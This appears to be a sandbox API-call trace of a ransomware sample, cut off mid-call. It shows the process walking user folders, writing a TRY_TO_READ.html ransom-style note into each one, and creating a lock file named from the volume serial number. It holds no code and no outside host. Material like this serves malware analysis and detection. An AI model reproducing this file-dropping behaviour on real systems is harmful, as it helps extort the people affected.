[0068.625] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.625] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.625] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.625] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b6e8 | out: hHeap=0x410000) returned 1 [0068.625] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0068.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.626] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.626] GetLastError () returned 0x0 [0068.626] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.626] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.627] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.627] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.627] CloseHandle (hObject=0x468) returned 1 [0068.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1a80 | out: hHeap=0x410000) returned 1 [0068.628] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0068.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.628] GetLastError () returned 0x0 [0068.628] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.629] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.629] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.629] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.630] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.630] CloseHandle (hObject=0x468) returned 1 [0068.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.630] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30a2d050, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0068.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.630] GetLastError () returned 0x0 [0068.630] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f50380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f50380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0068.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.630] GetLastError () returned 0x0 [0068.630] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.631] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.631] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.632] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.634] CloseHandle (hObject=0x468) returned 1 [0068.634] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.634] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.634] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.634] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b740 | out: hHeap=0x410000) returned 1 [0068.634] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f50380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f50380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0068.634] CloseHandle (hObject=0x3cc) returned 1 [0068.634] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.634] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x8, wMilliseconds=0xd8)) [0068.635] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0068.635] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0068.635] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0068.635] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users9c354ca09c354b444c.lock") returned 42 [0068.635] CreateFileW (lpFileName="C:\\\\Users\\All Users9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0068.635] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.635] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0068.636] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0068.636] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0068.636] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f590 | out: hHeap=0x410000) returned 1 [0068.636] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e870 [0068.636] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.636] GetLastError () returned 0x0 [0068.636] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.636] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.636] GetLastError () returned 0x0 [0068.636] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0068.636] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.636] GetLastError () returned 0x0 [0068.636] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.638] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.638] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.639] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.639] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.639] CloseHandle (hObject=0x46c) returned 1 [0068.639] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.639] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.639] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.639] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0068.639] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0068.639] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.639] GetLastError () returned 0x0 [0068.639] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.640] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.640] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.641] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.641] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.641] CloseHandle (hObject=0x46c) returned 1 [0068.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b740 | out: hHeap=0x410000) returned 1 [0068.642] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0068.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.642] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.642] GetLastError () returned 0xb7 [0068.642] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.642] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.642] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.643] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.643] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.643] CloseHandle (hObject=0x46c) returned 1 [0068.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0068.644] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0068.644] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.644] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.644] GetLastError () returned 0x0 [0068.644] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.645] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.645] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.645] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.646] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.646] CloseHandle (hObject=0x46c) returned 1 [0068.646] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.646] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.646] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.646] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0068.646] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0068.646] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.646] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.646] GetLastError () returned 0x0 [0068.646] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.647] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.647] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.648] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.648] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.648] CloseHandle (hObject=0x46c) returned 1 [0068.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454238 | out: hHeap=0x410000) returned 1 [0068.649] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0068.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.649] GetLastError () returned 0x0 [0068.649] FindNextFileW (in: 